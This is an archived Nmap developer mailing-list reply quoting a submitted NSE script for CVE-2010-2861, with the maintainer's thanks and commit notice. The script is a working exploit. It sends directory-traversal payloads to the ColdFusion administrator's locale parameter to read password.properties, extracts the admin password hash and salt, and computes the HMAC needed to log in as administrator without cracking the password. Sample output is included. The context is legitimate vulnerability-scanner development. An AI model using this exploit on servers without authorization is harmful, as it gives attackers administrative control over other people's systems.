Nmap Development mailing list archives

Re: NSE: http-vuln-cve2010-2861 submission for review

From: Patrik Karlsson <patrik () cqure net>
Date: Sun, 19 Feb 2012 15:42:31 +0100

On Fri, Feb 17, 2012 at 3:59 AM, Micah <micah.hoffman () gmail com> wrote:

This is a revision of an earlier NSE script I submitted. Thanks Patrik for
the assistance in cleaning it up and adding some features.

This NSE exploits a directory traversal in ColdFusion servers and grabs
password hashes. It then creates a SHA1 HMAC of that hash using a salt
embedded in the ColdFusion page. With this info, anyone can log into the
server as the administrator without any password guessing or cracking.

--- MIcah


------
http-vuln-cve2010-2861

description = [[
This script will execute a directory traversal attack against a ColdFusion
server and try to grab the password hash for the administrator user. It
will then use the salt value (hidden in the web page) to create the SHA1
HMAC hash that the web server needs for authentication as admin. You can
pass this value to the ColdFusion server as the admin without cracking
the password hash.
]]

---
-- @usage
-- nmap --script http-vuln-cve2010-2861 <host>
--
-- @output
-- 80/tcp open  http
-- | http-vuln-cve2010-2861:
-- |   VULNERABLE:
-- |   Adobe ColdFusion enter.cfm Traversal password.properties Information
Disclosure
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2010-2861  OSVDB:67047
-- |     Description:
-- |       Multiple directory traversal vulnerabilities in the
administrator console in Adobe ColdFusion
-- |       9.0.1 and earlier allow remote attackers to read arbitrary files
via the locale parameter
-- |     Disclosure date: 2010-08-10
-- |     Extra information:
-- |
-- |   ColdFusion8
-- |   HMAC: d6914bef568f8931d0c696cd5f7748596f97db5d
-- |   Salt: 1329446896585
-- |   Hash: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
-- |
-- |     References:
-- |       http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
-- |       http://www.nessus.org/plugins/index.php?view=single&id=48340
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861
-- |       http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
-- |_      http://osvdb.org/67047
--
--
-- This script relies on the service being identified as HTTP or HTTPS. If
the
-- ColdFusion server you run this against is on a port other than 80/tcp or
443/tcp
-- then use "nmap -sV" so that nmap discovers the port as an HTTP server.

author = "Micah Hoffman"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"intrusive", "vuln"}

require("http")
require("shortport")
require("tab")
require("vulns")
require("openssl")

portrule = shortport.http

action = function(host, port)
   local vuln = {
       title = 'Adobe ColdFusion enter.cfm Traversal password.properties
Information Disclosure',
       state = vulns.STATE.NOT_VULN, -- default
       IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
       description = [[
Multiple directory traversal vulnerabilities in the administrator console
in Adobe ColdFusion
9.0.1 and earlier allow remote attackers to read arbitrary files via the
locale parameter]],
       references = {
           'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
',
           'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
',
           'http://osvdb.org/67047&apos;,
           'http://www.nessus.org/plugins/index.php?view=single&id=48340&apos;,
       },
       dates = {
           disclosure = {year = '2010', month = '08', day = '10'},
       },
     }
   local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

-- Function to do the look up and return content
local grabAndGrep = function(page)
 -- Do the HTTP GET request for the page
local response = http.get(host, port, page)
 -- Check to see if we get a good page returned
-- Is there no response?
 if ( not(response.status) ) then
return false, "Received no response from HTTP server"
 end

-- Is the response not an HTTP 200 code?
if ( response.status ~= 200 ) then
 return false, ("The server returned an unexpected response
(%d)"):format(response.status )
end

-- Now check the body for our strings
if ( response.body ) then
 local saltcontent = response.body:match("salt.*value=\"(%d+)")
local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra
%x's needed or it will match strings that are not the long hex password

-- If a page has both the salt and the password in it then the exploit has
been successful
if ( saltcontent and hashcontent ) then
 vuln.state = vulns.STATE.VULN

-- Generate HMAC as this is what the web application needs for
authentication as admin
 local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent,
hashcontent))
   return true, string.format("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s",
hmaccontent, saltcontent, hashcontent)
 end
end
return false, "Not vulnerable"
 end

local exploits = {
['CFusionMX'] =

'..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en',
 ['CFusionMX7'] =

 '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en',
['ColdFusion8'] =

'..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en',
 ['JRun4\\servers'] =

'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en',
 }

local results = tab.new(2)
for prod, exploit in pairs(exploits) do
 local status, result =
grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
 tab.addrow(results, prod, result)
end
end
 vuln.extra_info="\n" .. tab.dump(results)

return vuln_report:make_output(vuln)

end
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/


Thank's Micah! I ended up doing some minor changes before committing it as
r28094.
Great work!
//Patrik
-- 
Patrik Karlsson
http://www.cqure.net
http://twitter.com/nevdull77
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

Current thread:

NSE: http-vuln-cve2010-2861 submission for review Micah (Feb 16)
- Re: NSE: http-vuln-cve2010-2861 submission for review Djalal Harouni (Feb 17)
  - Re: NSE: http-vuln-cve2010-2861 submission for review Djalal Harouni (Feb 17)
- Re: NSE: http-vuln-cve2010-2861 submission for review Patrik Karlsson (Feb 19)